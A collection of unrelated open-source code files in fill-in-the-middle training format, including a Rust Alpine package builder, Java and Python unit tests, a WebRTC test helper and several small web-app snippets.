".format(pstartflag,pstartflag) os.system(cmd2) print "Downloading Images Complete..." os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images<|fim▁end|>
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech" year_input = input()
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>#![deny( missing_debug_implementations, missing_copy_implementations, warnings, trivial_numeric_casts, unstable_features, unused, future_incompatible )] use actix_web::server; use anyhow::Result; use log::info; use potboiler_common::pg; use std::env; fn main() -> Result<()> { log4rs::init_file("log.yaml", Default::default()).expect("log config ok"); let db_url: &str = &env::var("DATABASE_URL").expect("Needed DATABASE_URL");<|fim▁hole|> let pool = pg::get_pool(db_url).unwrap(); let app_state = pigtail::AppState::new(pool)?; let port: u16 = env::var("PORT") .unwrap_or_else(|_| "8000".to_string()) .parse::<u16>() .unwrap(); server::new(move || pigtail::app_router(app_state.clone()).unwrap().finish()) .bind(("0.0.0.0", port)) .unwrap() .run(); pigtail::register(); info!("Pigtail booted"); Ok(()) }<|fim▁end|>
<|file_name|>ReviewInviteControllerTest.java<|end_file_name|><|fim▁begin|>package org.innovateuk.ifs.assessment.invite.controller; import org.innovateuk.ifs.BaseControllerMockMVCTest; import org.innovateuk.ifs.assessment.invite.form.ReviewInviteForm; import org.innovateuk.ifs.assessment.invite.populator.ReviewInviteModelPopulator; import org.innovateuk.ifs.assessment.invite.viewmodel.ReviewInviteViewModel; import org.innovateuk.ifs.invite.resource.RejectionReasonResource; import org.innovateuk.ifs.invite.resource.ReviewInviteResource; import org.innovateuk.ifs.invite.service.RejectionReasonRestService; import org.innovateuk.ifs.review.service.ReviewInviteRestService; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.mockito.InOrder; import org.mockito.InjectMocks; import org.mockito.Mock; import org.mockito.Spy; import org.mockito.junit.MockitoJUnitRunner; import org.springframework.http.MediaType; import org.springframework.test.context.TestPropertySource; import org.springframework.test.web.servlet.MvcResult; import org.springframework.validation.BindingResult; import java.time.ZonedDateTime; import java.util.List; import static java.lang.Boolean.TRUE; import static java.util.Collections.nCopies; import static org.innovateuk.ifs.commons.error.CommonErrors.notFoundError; import static org.innovateuk.ifs.commons.error.CommonFailureKeys.GENERAL_NOT_FOUND; import static org.innovateuk.ifs.commons.rest.RestResult.restFailure; import static org.innovateuk.ifs.commons.rest.RestResult.restSuccess; import static org.innovateuk.ifs.invite.builder.RejectionReasonResourceBuilder.newRejectionReasonResource; import static org.innovateuk.ifs.review.builder.ReviewInviteResourceBuilder.newReviewInviteResource; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertTrue; import static org.mockito.Mockito.*; import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get; import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.post; import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*; @RunWith(MockitoJUnitRunner.Silent.class) @TestPropertySource(locations = { "classpath:application.properties", "classpath:/application-web-core.properties"} ) public class ReviewInviteControllerTest extends BaseControllerMockMVCTest<ReviewInviteController> { @Spy @InjectMocks private ReviewInviteModelPopulator reviewInviteModelPopulator; @Mock private RejectionReasonRestService rejectionReasonRestService; @Mock private ReviewInviteRestService reviewInviteRestService; private List<RejectionReasonResource> rejectionReasons = newRejectionReasonResource() .withReason("Reason 1", "Reason 2") .build(2); private static final String restUrl = "/invite/panel/"; @Override protected ReviewInviteController supplyControllerUnderTest() { return new ReviewInviteController(); } @Before public void setUp() { when(rejectionReasonRestService.findAllActive()).thenReturn(restSuccess(rejectionReasons)); } @Test public void acceptInvite_loggedIn() throws Exception { Boolean accept = true; mockMvc.perform(post(restUrl + "{inviteHash}/decision", "hash") .contentType(MediaType.APPLICATION_FORM_URLENCODED) .param("acceptInvitation", accept.toString())) .andExpect(status().is3xxRedirection()) .andExpect(redirectedUrl("/invite-accept/panel/hash/accept")); verifyZeroInteractions(reviewInviteRestService); } @Test public void acceptInvite_notLoggedInAndExistingUser() throws Exception { setLoggedInUser(null); ZonedDateTime panelDate = ZonedDateTime.now(); Boolean accept = true; ReviewInviteResource inviteResource = newReviewInviteResource() .withCompetitionName("my competition") .withPanelDate(panelDate) .build(); <|fim▁hole|> ReviewInviteViewModel expectedViewModel = new ReviewInviteViewModel("hash", inviteResource, false); when(reviewInviteRestService.checkExistingUser("hash")).thenReturn(restSuccess(TRUE)); when(reviewInviteRestService.openInvite("hash")).thenReturn(restSuccess(inviteResource)); mockMvc.perform(post(restUrl + "{inviteHash}/decision", "hash") .contentType(MediaType.APPLICATION_FORM_URLENCODED) .param("acceptInvitation", accept.toString())) .andExpect(status().isOk()) .andExpect(model().attribute("model", expectedViewModel)) .andExpect(view().name("assessor-panel-accept-user-exists-but-not-logged-in")); InOrder inOrder = inOrder(reviewInviteRestService); inOrder.verify(reviewInviteRestService).checkExistingUser("hash"); inOrder.verify(reviewInviteRestService).openInvite("hash"); inOrder.verifyNoMoreInteractions(); } @Test public void confirmAcceptInvite() throws Exception { when(reviewInviteRestService.acceptInvite("hash")).thenReturn(restSuccess()); mockMvc.perform(get("/invite-accept/panel/{inviteHash}/accept", "hash")) .andExpect(status().is3xxRedirection()) .andExpect(redirectedUrl("/assessor/dashboard")); verify(reviewInviteRestService).acceptInvite("hash"); } @Test public void confirmAcceptInvite_hashNotExists() throws Exception { when(reviewInviteRestService.acceptInvite("notExistHash")).thenReturn(restFailure(GENERAL_NOT_FOUND)); mockMvc.perform(get("/invite-accept/panel/{inviteHash}/accept", "notExistHash")) .andExpect(status().isNotFound()); verify(reviewInviteRestService).acceptInvite("notExistHash"); } @Test public void openInvite() throws Exception { ZonedDateTime panelDate = ZonedDateTime.now(); ReviewInviteResource inviteResource = newReviewInviteResource().withCompetitionName("my competition") .withPanelDate(panelDate) .build(); ReviewInviteViewModel expectedViewModel = new ReviewInviteViewModel("hash", inviteResource, true); when(reviewInviteRestService.openInvite("hash")).thenReturn(restSuccess(inviteResource)); mockMvc.perform(get(restUrl + "{inviteHash}", "hash")) .andExpect(status().isOk()) .andExpect(view().name("assessor-panel-invite")) .andExpect(model().attribute("model", expectedViewModel)); verify(reviewInviteRestService).openInvite("hash"); } @Test public void openInvite_hashNotExists() throws Exception { when(reviewInviteRestService.openInvite("notExistHash")).thenReturn(restFailure(notFoundError(ReviewInviteResource.class, "notExistHash"))); mockMvc.perform(get(restUrl + "{inviteHash}", "notExistHash")) .andExpect(model().attributeDoesNotExist("model")) .andExpect(status().isNotFound()); verify(reviewInviteRestService).openInvite("notExistHash"); } @Test public void noDecisionMade() throws Exception { ReviewInviteResource inviteResource = newReviewInviteResource().withCompetitionName("my competition").build(); when(reviewInviteRestService.openInvite("hash")).thenReturn(restSuccess(inviteResource)); ReviewInviteForm expectedForm = new ReviewInviteForm(); MvcResult result = mockMvc.perform(post(restUrl + "{inviteHash}/decision", "hash")) .andExpect(status().isOk()) .andExpect(model().hasErrors()) .andExpect(model().attributeHasFieldErrors("form", "acceptInvitation")) .andExpect(model().attribute("form", expectedForm)) .andExpect(model().attribute("rejectionReasons", rejectionReasons)) .andExpect(model().attributeExists("model")) .andExpect(view().name("assessor-panel-invite")).andReturn(); ReviewInviteViewModel model = (ReviewInviteViewModel) result.getModelAndView().getModel().get("model"); assertEquals("hash", model.getPanelInviteHash()); assertEquals("my competition", model.getCompetitionName()); ReviewInviteForm form = (ReviewInviteForm) result.getModelAndView().getModel().get("form"); BindingResult bindingResult = form.getBindingResult(); assertTrue(bindingResult.hasErrors()); assertEquals(0, bindingResult.getGlobalErrorCount()); assertEquals(1, bindingResult.getFieldErrorCount()); assertTrue(bindingResult.hasFieldErrors("acceptInvitation")); assertEquals("Please indicate your decision.", bindingResult.getFieldError("acceptInvitation").getDefaultMessage()); verify(reviewInviteRestService).openInvite("hash"); verifyNoMoreInteractions(reviewInviteRestService); } @Test public void rejectInvite() throws Exception { Boolean accept = false; when(reviewInviteRestService.rejectInvite("hash")).thenReturn(restSuccess()); mockMvc.perform(post(restUrl + "{inviteHash}/decision", "hash") .contentType(MediaType.APPLICATION_FORM_URLENCODED) .param("acceptInvitation", accept.toString())) .andExpect(status().is3xxRedirection()) .andExpect(redirectedUrl("/invite/panel/hash/reject/thank-you")); verify(reviewInviteRestService).rejectInvite("hash"); verifyNoMoreInteractions(reviewInviteRestService); } @Test public void rejectInvite_hashNotExists() throws Exception { String comment = String.join(" ", nCopies(100, "comment")); Boolean accept = false; when(reviewInviteRestService.rejectInvite("notExistHash")).thenReturn(restFailure(notFoundError(ReviewInviteResource.class, "notExistHash"))); when(reviewInviteRestService.openInvite("notExistHash")).thenReturn(restFailure(notFoundError(ReviewInviteResource.class, "notExistHash"))); mockMvc.perform(post(restUrl + "{inviteHash}/decision", "notExistHash") .contentType(MediaType.APPLICATION_FORM_URLENCODED) .param("acceptInvitation", accept.toString())) .andExpect(status().isNotFound()); InOrder inOrder = inOrder(reviewInviteRestService); inOrder.verify(reviewInviteRestService).rejectInvite("notExistHash"); inOrder.verify(reviewInviteRestService).openInvite("notExistHash"); inOrder.verifyNoMoreInteractions(); } @Test public void rejectThankYou() throws Exception { mockMvc.perform(get(restUrl + "{inviteHash}/reject/thank-you", "hash")) .andExpect(status().isOk()) .andExpect(view().name("assessor-panel-reject")) .andReturn(); } }<|fim▁end|>
<|file_name|>test_cuttle_class.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 """ Tests related to the Cuttle class. """ import os import unittest import warnings import time from cuttle.reef import Cuttle, Column from cuttlepool import CuttlePool from cuttlepool.cuttlepool import PoolConnection DB = '_cuttle_test_db' DB2 = '_cuttle_test_db2' HOST = 'localhost' class BaseDbTestCase(unittest.TestCase): def setUp(self): self.Pool = CuttlePool self.Connection = PoolConnection self.credentials = dict(host=HOST) self.sql_type = os.environ['TEST_CUTTLE'].lower() if self.sql_type == 'mysql': import pymysql from mysql_credentials import USER, PASSWD self.Cursor = pymysql.cursors.Cursor self.connect = pymysql.connect self.credentials.update(dict(user=USER, passwd=PASSWD)) self.db = Cuttle(self.sql_type, db=DB, **self.credentials) class Heros(self.db.Model): columns = [ Column('hero_id', 'INT', auto_increment=True, primary_key=True), Column('hero_name', 'VARCHAR', maximum=16) ] self.testtable1 = Heros self.create_heros_statement = ( 'CREATE TABLE IF NOT EXISTS {} (\n' 'hero_id INT AUTO_INCREMENT PRIMARY KEY,\n' 'hero_name VARCHAR(16)\n' ')').format(self.testtable1().name) self.heros_schema = (('hero_id', 'int(11)', 'NO', 'PRI', None, 'auto_increment'), ('hero_name', 'varchar(16)', 'YES', '', None, '')) def tearDown(self): warnings.filterwarnings('ignore') self.db.drop_db() def createPool(self, **kwargs): warnings.filterwarnings('ignore') return CuttlePool(self.connect, **kwargs) class DbNestedModelTestCase(BaseDbTestCase): def setUp(self): super(DbNestedModelTestCase, self).setUp() class UselessTable(self.db.Model): pass self.uselesstable = UselessTable class Villains(UselessTable): columns = [ Column('villain_id', 'INT'), Column('villain_name', 'VARCHAR', maximum=16) ] self.testtable2 = Villains class TwoDbTestCase(BaseDbTestCase): def setUp(self): super(TwoDbTestCase, self).setUp() self.db2 = Cuttle(self.sql_type, db=DB2, **self.credentials) class ThrowAway(self.db2.Model): columns = [ Column('throwaway', 'INT') ] self.testtable2 = ThrowAway<|fim▁hole|> super(TwoDbTestCase, self).tearDown() self.db2.drop_db() class CuttleInstanceTestCase(unittest.TestCase): def test_improper_sql_type(self): with self.assertRaises(ValueError): db = Cuttle('wrongsql', db='db') def test_no_db(self): with self.assertRaises(ValueError): db = Cuttle('mysql') def test_name_property(self): db_name = 'get_schwifty' db = Cuttle('mysql', db=db_name) self.assertEqual(db.name, db_name) class CuttleCreateDbTestCase(BaseDbTestCase): def test_create_db(self): self.db.create_db() pool = self.createPool(db=DB, **self.credentials) con = pool.get_connection() cur = con.cursor() # get databases cur.execute('SHOW DATABASES') dbs = cur.fetchall() self.assertIn((DB,), dbs) def test_table_schema(self): self.db.create_db() pool = self.createPool(db=DB, **self.credentials) con = pool.get_connection() cur = con.cursor() # get tables cur.execute('SHOW TABLES') tbls = cur.fetchall() self.assertEqual(((self.testtable1().name,),), tbls) # get table schema cur.execute('DESCRIBE {}'.format(self.testtable1().name)) tblschma = cur.fetchall() self.assertEqual(self.heros_schema, tblschma) class CuttleCreateMultiDbTestCase(TwoDbTestCase): def test_create_two_dbs(self): self.db.create_db() self.db2.create_db() pool1 = self.createPool(db=DB, **self.credentials) pool2 = self.createPool(db=DB2, **self.credentials) con1 = pool1.get_connection() cur1 = con1.cursor() con2 = pool2.get_connection() cur2 = con2.cursor() # get databases cur1.execute('SHOW DATABASES') dbs = cur1.fetchall() self.assertIn((DB,), dbs) self.assertIn((DB2,), dbs) # get tables cur1.execute('SHOW TABLES') tbls1 = cur1.fetchall() cur2.execute('SHOW TABLES') tbls2 = cur2.fetchall() self.assertIn((self.testtable1().name,), tbls1) self.assertNotIn((self.testtable2().name,), tbls1) self.assertIn((self.testtable2().name,), tbls2) self.assertNotIn((self.testtable1().name,), tbls2) class CuttleCreateDbNestedModelsTestCase(DbNestedModelTestCase): def test_correct_tables_made(self): self.db.create_db() pool = self.createPool(db=DB, **self.credentials) con = pool.get_connection() cur = con.cursor() # get tables cur.execute('SHOW TABLES') tbls = cur.fetchall() self.assertIn((self.testtable1().name,), tbls) self.assertIn((self.testtable2().name,), tbls) self.assertNotIn((self.uselesstable().name,), tbls) class CuttleDropDbTestCase(BaseDbTestCase): def setUp(self): super(CuttleDropDbTestCase, self).setUp() self.db.create_db() def test_drop_db(self): pool = self.createPool(**self.credentials) con = pool.get_connection() cur = con.cursor() # get databases cur.execute('SHOW DATABASES') dbs = cur.fetchall() # make sure database actually exists self.assertIn((DB,), dbs) # drop the database self.db.drop_db() # get databases cur.execute('SHOW DATABASES') dbs = cur.fetchall() # make sure database no longer exists self.assertNotIn((DB,), dbs)<|fim▁end|>
def tearDown(self):
<|file_name|>base_primitives.cc<|end_file_name|><|fim▁begin|><|fim▁hole|>/* * Copyright (c) 2012 The WebRTC project authors. All Rights Reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contributing project authors may * be found in the AUTHORS file in the root of the source tree. */ #include "base_primitives.h" #include "vie_autotest.h" #include "vie_autotest_defines.h" #include "webrtc/modules/video_capture/include/video_capture_factory.h" void TestI420CallSetup(webrtc::ViECodec* codec_interface, webrtc::VideoEngine* video_engine, webrtc::ViEBase* base_interface, webrtc::ViENetwork* network_interface, int video_channel, const char* device_name) { webrtc::VideoCodec video_codec; memset(&video_codec, 0, sizeof(webrtc::VideoCodec)); // Set up the codec interface with all known receive codecs and with // I420 as the send codec. for (int i = 0; i < codec_interface->NumberOfCodecs(); i++) { EXPECT_EQ(0, codec_interface->GetCodec(i, video_codec)); // Try to keep the test frame size small when I420. if (video_codec.codecType == webrtc::kVideoCodecI420) { video_codec.width = 176; video_codec.height = 144; EXPECT_EQ(0, codec_interface->SetSendCodec(video_channel, video_codec)); } EXPECT_EQ(0, codec_interface->SetReceiveCodec(video_channel, video_codec)); } // Verify that we really found the I420 codec. EXPECT_EQ(0, codec_interface->GetSendCodec(video_channel, video_codec)); EXPECT_EQ(webrtc::kVideoCodecI420, video_codec.codecType); // Set up senders and receivers. char version[1024] = ""; EXPECT_EQ(0, base_interface->GetVersion(version)); ViETest::Log("\nUsing WebRTC Video Engine version: %s", version); const char *ipAddress = "127.0.0.1"; WebRtc_UWord16 rtpPortListen = 6100; WebRtc_UWord16 rtpPortSend = 6100; EXPECT_EQ(0, network_interface->SetLocalReceiver(video_channel, rtpPortListen)); EXPECT_EQ(0, base_interface->StartReceive(video_channel)); EXPECT_EQ(0, network_interface->SetSendDestination(video_channel, ipAddress, rtpPortSend)); EXPECT_EQ(0, base_interface->StartSend(video_channel)); // Call started. ViETest::Log("Call started"); AutoTestSleep(KAutoTestSleepTimeMs); // Done. EXPECT_EQ(0, base_interface->StopSend(video_channel)); }<|fim▁end|>
<|file_name|>original-document.js<|end_file_name|><|fim▁begin|>'use strict'; var util = require('util'); var BaseController = require('hof').controllers.base; var OriginalDocumentController = function OriginalDocumentController() { BaseController.apply(this, arguments); }; util.inherits(OriginalDocumentController, BaseController); OriginalDocumentController.prototype.getValues = function getValues(req, res, callback) { res.locals.backLink = 'other-documents'; BaseController.prototype.getValues.call(this, req, res, callback);<|fim▁hole|>} module.exports = OriginalDocumentController;<|fim▁end|>
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>mod modul1;<|fim▁hole|> fn main() { modul1::func1(); modul2::func1(); // func1(); // error: unresolved name `func1` // func1(); // works when use modul1::func1; is added } // called func1 from modul1 // called func1 from modul2<|fim▁end|>
mod modul2; // use modul1::func1;
<|file_name|>alpine.rs<|end_file_name|><|fim▁begin|>use std::io::Write; use std::fs::File; use std::path::Path; use unshare::{Command, Stdio}; use rand::{thread_rng, Rng}; use super::super::super::file_util::create_dir; use super::super::context::{Context}; use super::super::capsule; use super::super::packages; use process_util::capture_stdout; use builder::distrib::{Distribution, Named, DistroBox}; use builder::error::StepError;<|fim▁hole|> #[derive(Debug)] pub struct Alpine { pub version: String, pub base_setup: bool, } impl Named for Alpine { fn static_name() -> &'static str { "alpine" } } impl Distribution for Alpine { fn name(&self) -> &'static str { "Alpine" } fn bootstrap(&mut self, ctx: &mut Context) -> Result<(), StepError> { if !self.base_setup { self.base_setup = true; try!(setup_base(ctx, &self.version)); } Ok(()) } fn install(&mut self, ctx: &mut Context, pkgs: &[String]) -> Result<(), StepError> { try!(self.bootstrap(ctx)); try!(capsule::apk_run(&[ "--root", "/vagga/root", "add", ], &pkgs[..])); Ok(()) } fn ensure_packages(&mut self, ctx: &mut Context, features: &[packages::Package]) -> Result<Vec<packages::Package>, StepError> { try!(self.bootstrap(ctx)); let mut to_install = vec!(); let mut unsupp = vec!(); for i in features.iter() { if let Some(lst) = build_deps(*i) { for i in lst.into_iter() { if !ctx.packages.contains(i) { if ctx.build_deps.insert(i.to_string()) { to_install.push(i.to_string()); } } } } else { unsupp.push(*i); continue; } if let Some(lst) = system_deps(*i) { for i in lst.into_iter() { let istr = i.to_string(); ctx.build_deps.remove(&istr); if ctx.packages.insert(istr.clone()) { to_install.push(istr); } } } else { unsupp.push(*i); continue; } } if to_install.len() > 0 { try!(capsule::apk_run(&[ "--root", "/vagga/root", "add", ], &to_install[..])); } return Ok(unsupp); } fn finish(&mut self, ctx: &mut Context) -> Result<(), String> { let pkgs = ctx.build_deps.clone().into_iter().collect(); try!(remove(ctx, &pkgs)); let mut cmd = Command::new("/vagga/bin/apk"); cmd .stdin(Stdio::null()) .env_clear() .arg("--root").arg("/vagga/root") .arg("-vv") .arg("info"); try!(capture_stdout(cmd) .map_err(|e| format!("Error dumping package list: {}", e)) .and_then(|out| { File::create("/vagga/container/alpine-packages.txt") .and_then(|mut f| f.write_all(&out)) .map_err(|e| format!("Error dumping package list: {}", e)) })); Ok(()) } } pub fn choose_mirror() -> String { let repos = MIRRORS .split('\n') .map(|x| x.trim()) .filter(|x| x.len() > 0 && !x.starts_with("#")) .collect::<Vec<&str>>(); let mirror = thread_rng().choose(&repos) .expect("At least one mirror should work"); debug!("Chosen mirror {}", mirror); return mirror.to_string(); } fn setup_base(ctx: &mut Context, version: &String) -> Result<(), String> { try!(capsule::ensure_features(ctx, &[capsule::AlpineInstaller])); try_msg!(create_dir("/vagga/root/etc/apk", true), "Error creating apk dir: {err}"); let mirror = ctx.settings.alpine_mirror.clone() .unwrap_or(choose_mirror()); try!(File::create("/vagga/root/etc/apk/repositories") .and_then(|mut f| write!(&mut f, "{}{}/main\n", mirror, version)) .map_err(|e| format!("Can't write repositories file: {}", e))); try!(capsule::apk_run(&[ "--update-cache", "--keys-dir=/etc/apk/keys", // Use keys from capsule "--root=/vagga/root", "--initdb", "add", "alpine-base", ], &[])); Ok(()) } pub fn remove(_ctx: &mut Context, pkgs: &Vec<String>) -> Result<(), String> { capsule::apk_run(&[ "--root", "/vagga/root", "del", ], &pkgs[..]) } fn build_deps(pkg: packages::Package) -> Option<Vec<&'static str>> { match pkg { packages::BuildEssential => Some(vec!("build-base")), packages::Https => Some(vec!("ca-certificates")), packages::Python2 => Some(vec!()), packages::Python2Dev => Some(vec!("python-dev")), packages::Python3 => Some(vec!()), packages::Python3Dev => Some(vec!("python3-dev")), packages::PipPy2 => None, packages::PipPy3 => None, packages::NodeJs => Some(vec!()), packages::NodeJsDev => Some(vec!("nodejs-dev")), packages::Npm => Some(vec!()), packages::Git => Some(vec!("git")), packages::Mercurial => Some(vec!("hg")), } } fn system_deps(pkg: packages::Package) -> Option<Vec<&'static str>> { match pkg { packages::BuildEssential => Some(vec!()), packages::Https => Some(vec!()), packages::Python2 => Some(vec!("python")), packages::Python2Dev => Some(vec!()), packages::Python3 => Some(vec!("python3")), packages::Python3Dev => Some(vec!()), packages::PipPy2 => None, packages::PipPy3 => None, packages::NodeJs => Some(vec!("nodejs")), packages::NodeJsDev => Some(vec!()), packages::Npm => Some(vec!("nodejs")), // Need duplicate? packages::Git => Some(vec!()), packages::Mercurial => Some(vec!()), } } pub fn configure(distro: &mut Box<Distribution>, ctx: &mut Context, ver: &str) -> Result<(), StepError> { try!(distro.set(Alpine { version: ver.to_string(), base_setup: false, })); try!(ctx.add_cache_dir(Path::new("/etc/apk/cache"), "alpine-cache".to_string())); ctx.environ.insert("LANG".to_string(), "en_US.UTF-8".to_string()); ctx.environ.insert("PATH".to_string(), "/usr/local/sbin:/usr/local/bin:\ /usr/sbin:/usr/bin:/sbin:/bin\ ".to_string()); Ok(()) }<|fim▁end|>
pub static LATEST_VERSION: &'static str = "v3.2"; static MIRRORS: &'static str = include_str!("../../../alpine/MIRRORS.txt");
<|file_name|>ResolveSimpleNameClassName.java<|end_file_name|><|fim▁begin|>package org.ljc.adoptojdk.class_name; import java.util.ArrayList; import java.util.Collection; import java.util.HashSet; <|fim▁hole|>import java.util.List; import java.util.Set; public class ResolveSimpleNameClassName { private Collection<String> packages = null; public Collection<String> getPackages() { Set<String> returnPackages = new HashSet<String>(); for (Package aPackage : Package.getPackages()) { returnPackages.add(aPackage.getName()); } return returnPackages; } public List<String> getFullyQualifiedNames(String simpleName) { if (this.packages == null) { this.packages = getPackages(); } List<String> fqns = new ArrayList<String>(); for (String aPackage : packages) { try { String fqn = aPackage + "." + simpleName; Class.forName(fqn); fqns.add(fqn); } catch (Exception e) { // Ignore } } return fqns; } }<|fim▁end|>
<|file_name|>groupBy.js<|end_file_name|><|fim▁begin|>const { stripIndent } = require('common-tags') <|fim▁hole|> let people = listOfPeople(); <> <${widgetName} data={people} textField='fullName' groupBy='lastName' /> <${widgetName} data={people} textField='fullName' groupBy={person => person.fullName.length} /> </> ` }<|fim▁end|>
module.exports = function (widgetName) { return stripIndent` import { ${widgetName} } from 'react-widgets';
<|file_name|>page.rs<|end_file_name|><|fim▁begin|>use iron::prelude::*; use iron::middleware::Handler; use iron::status; use iron::headers::{ContentType}; use utils::Utils; use rustview::view::View; pub struct Index { utils: Utils, template: View, } impl Index { pub fn new(utils: Utils, admin_template: View) -> Index { Index { utils: utils, template: admin_template, } } } impl Handler for Index { fn handle(&self, req: &mut Request) -> IronResult<Response> { let model = json!({ "title": "Testing", "newTitle": "New Cool Title here :)", "helloUser": "Hi Andrei !", "testText": "It's working!!!!!", "user": "Andrei", "child_user": "Pages" });<|fim▁hole|> Ok(response) } }<|fim▁end|>
let mut response = Response::with((status::Ok, self.template.render("home.html", model))); response.headers.set(ContentType::html());
<|file_name|>inputs_p38_singlet.py<|end_file_name|><|fim▁begin|>import json import numpy as np from glob import glob inputs = { 'xml_file_path' : "./data/single_wavelength_copy", 'file_set' : {'p38' : glob( "./data/single_wavelength_copy/*.xml")}, 'section' : '280_480_TOP_120', 'ligand_order' : ['Bosutinib','Bosutinib Isomer','Erlotinib','Gefitinib','Ponatinib','Lapatinib','Saracatinib','Vandetanib'],<|fim▁hole|> 'well_area' : 0.1369, # well area, cm^2 for 4ti-0203 [http://4ti.co.uk/files/3113/4217/2464/4ti-0201.pdf] } inputs['Lstated'] = inputs['Lstated'].tolist() inputs['Pstated'] = inputs['Pstated'].tolist() with open('inputs.json', 'w') as fp: json.dump(inputs, fp)<|fim▁end|>
'Lstated' : np.array([20.0e-6,14.0e-6,9.82e-6,6.88e-6,4.82e-6,3.38e-6,2.37e-6,1.66e-6,1.16e-6,0.815e-6,0.571e-6,0.4e-6,0.28e-6,0.196e-6,0.138e-6,0.0964e-6,0.0676e-6,0.0474e-6,0.0320e-6,0.0240e-6,0.0160e-6,0.0120e-6,0.008e-6,0.0], np.float64), # ligand concentration, M 'Pstated' : 0.5e-6 * np.ones([24],np.float64), # protein concentration, M 'assay_volume' : 50e-6, # assay volume, L
<|file_name|>run_examples.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python import doctest<|fim▁hole|>import sys def test_suite(docs): suite = unittest.TestSuite() for doc in docs: suite.addTest(doctest.DocFileSuite(doc, optionflags=flags())) return suite def flags(): flags = doctest.NORMALIZE_WHITESPACE|doctest.ELLIPSIS if sys.version_info >= (3,): flags |= doctest.IGNORE_EXCEPTION_DETAIL return flags def run(docs): suite = test_suite(docs) runner = unittest.TextTestRunner(verbosity=2) result = runner.run(suite) sys.exit(int(bool(result.failures or result.errors))) if __name__ == '__main__': run(sys.argv)<|fim▁end|>
import unittest
<|file_name|>test_plugin_maven.py<|end_file_name|><|fim▁begin|># -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*- # # Copyright (C) 2016 Canonical Ltd # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import io import os from unittest import mock from xml.etree import ElementTree import fixtures from testtools.matchers import HasLength import snapcraft from snapcraft import tests from snapcraft.plugins import maven class MavenPluginTestCase(tests.TestCase): def setUp(self): super().setUp() class Options: maven_options = [] maven_targets = [''] self.options = Options() self.project_options = snapcraft.ProjectOptions() patcher = mock.patch('snapcraft.repo.Ubuntu') self.ubuntu_mock = patcher.start() self.addCleanup(patcher.stop) @staticmethod def _canonicalize_settings(settings): with io.StringIO(settings) as f: tree = ElementTree.parse(f) for element in tree.iter(): if element.text is not None and element.text.isspace(): element.text = None if element.tail is not None and element.tail.isspace(): element.tail = None with io.StringIO() as f: tree.write( f, encoding='unicode', default_namespace='http://maven.apache.org/SETTINGS/1.0.0') return f.getvalue() + '\n' def test_get_build_properties(self): expected_build_properties = ['maven-options', 'maven-targets'] resulting_build_properties = maven.MavenPlugin.get_build_properties() self.assertThat(resulting_build_properties, HasLength(len(expected_build_properties))) for property in expected_build_properties: self.assertIn(property, resulting_build_properties) def assertSettingsEqual(self, expected, observed): print(repr(self._canonicalize_settings(expected))) print(repr(self._canonicalize_settings(observed))) self.assertEqual( self._canonicalize_settings(expected), self._canonicalize_settings(observed)) def test_schema(self): schema = maven.MavenPlugin.schema() properties = schema['properties'] self.assertTrue('maven-options' in properties, 'Expected "maven-options" to be included in ' 'properties') maven_options = properties['maven-options'] self.assertTrue( 'type' in maven_options, 'Expected "type" to be included in "maven-options"') self.assertEqual(maven_options['type'], 'array', 'Expected "maven-options" "type" to be "array", but ' 'it was "{}"'.format(maven_options['type'])) self.assertTrue( 'minitems' in maven_options, 'Expected "minitems" to be included in "maven-options"') self.assertEqual(maven_options['minitems'], 1, 'Expected "maven-options" "minitems" to be 1, but ' 'it was "{}"'.format(maven_options['minitems'])) self.assertTrue( 'uniqueItems' in maven_options, 'Expected "uniqueItems" to be included in "maven-options"') self.assertTrue( maven_options['uniqueItems'], 'Expected "maven-options" "uniqueItems" to be "True"') maven_targets = properties['maven-targets'] self.assertTrue( 'type' in maven_targets, 'Expected "type" to be included in "maven-targets"') self.assertEqual(maven_targets['type'], 'array', 'Expected "maven-targets" "type" to be "array", but ' 'it was "{}"'.format(maven_targets['type'])) self.assertTrue( 'minitems' in maven_targets, 'Expected "minitems" to be included in "maven-targets"') self.assertEqual(maven_targets['minitems'], 1, 'Expected "maven-targets" "minitems" to be 1, but ' 'it was "{}"'.format(maven_targets['minitems'])) self.assertTrue( 'uniqueItems' in maven_targets, 'Expected "uniqueItems" to be included in "maven-targets"') self.assertTrue( maven_targets['uniqueItems'], 'Expected "maven-targets" "uniqueItems" to be "True"') @mock.patch.object(maven.MavenPlugin, 'run') def test_build(self, run_mock): env_vars = ( ('http_proxy', None), ('https_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) def side(l): os.makedirs(os.path.join(plugin.builddir, 'target')) open(os.path.join(plugin.builddir, 'target', 'dummy.jar'), 'w').close() run_mock.side_effect = side os.makedirs(plugin.sourcedir) plugin.build() run_mock.assert_has_calls([ mock.call(['mvn', 'package']), ]) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_fail(self, run_mock): env_vars = ( ('http_proxy', None), ('https_proxy', None), ) for v in env_vars: self.useFixture(fixtures.EnvironmentVariable(v[0], v[1])) plugin = maven.MavenPlugin('test-part', self.options, self.project_options) os.makedirs(plugin.sourcedir) self.assertRaises(RuntimeError, plugin.build) run_mock.assert_has_calls([ mock.call(['mvn', 'package']), ]) @mock.patch.object(maven.MavenPlugin, 'run') def test_build_war(self, run_mock): env_vars = ( ('http_proxy', None), ('https_proxy', None), 